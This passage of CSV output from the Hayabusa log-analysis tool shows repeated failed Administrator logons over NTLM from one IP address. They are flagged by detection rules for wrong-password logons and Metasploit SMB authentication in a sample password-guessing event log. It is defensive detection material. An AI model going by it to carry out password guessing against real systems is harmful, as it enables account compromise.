NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qfcC6LqJqs0EeGjE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXALYkkitmyAFq14 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIqQmExq22WrW4md : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ydHqjdZhLMI9gjfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSe45VZNPdovPbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hiHlcR6qNGE0P7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: iT3jPdHr89RqPlyd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0QFnABeYK39XEntR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5plMYSBQi5mKmdlk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TaxWckQUCMgWvCZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81xZ7iisEyTABmUm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qYiQ2xjMQFQwH2XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRN8e3yzZzxc2p3A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCa6PN0C7XznvipG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hFqjIXbEb7eWUFUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkrVjLgnJZlIyXpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 2r5tyuIYijAXN5be : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AgjQNe9hQrLIETDn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNoInpFTsixZDIu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ladJUS6I0HMIwdef : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oW63pJlVtjgn3YY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKNu8b2To2Y1twUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9sN5xm3GytfmM7G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtQQS61GYBm6WUUz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WxxawZZMhNCGHxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sKP8G2VgJlrr9LMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VvOsNQpk3c5p1FgK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7oz7NPh5Z8UrDPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvzNFOLBlBv98Do4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KJmYytO30Icc6Rb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zro3jLjFXWZ2o8VL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Z2J8VYeuxd9fKcG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXMjOKLfMex7OmMv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgbm3YeoGxCa22Il : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7MEstBFjiWhVE18 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8Y2kDEiMZWf0znn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zBAFVgPIOyCvtdRs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s3pFhUcspF6lzQXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39LFXXW715pQoADC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: in4ewyxouUnxQzCQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOtV8CLIU6Mcw2ty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8NJqimhGrg9uhTh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XEWLTOY9magV0h6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Di1MZsJx52Bi8E6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22MdB2QodynfibkF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qojej3YITXvXJ6Pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
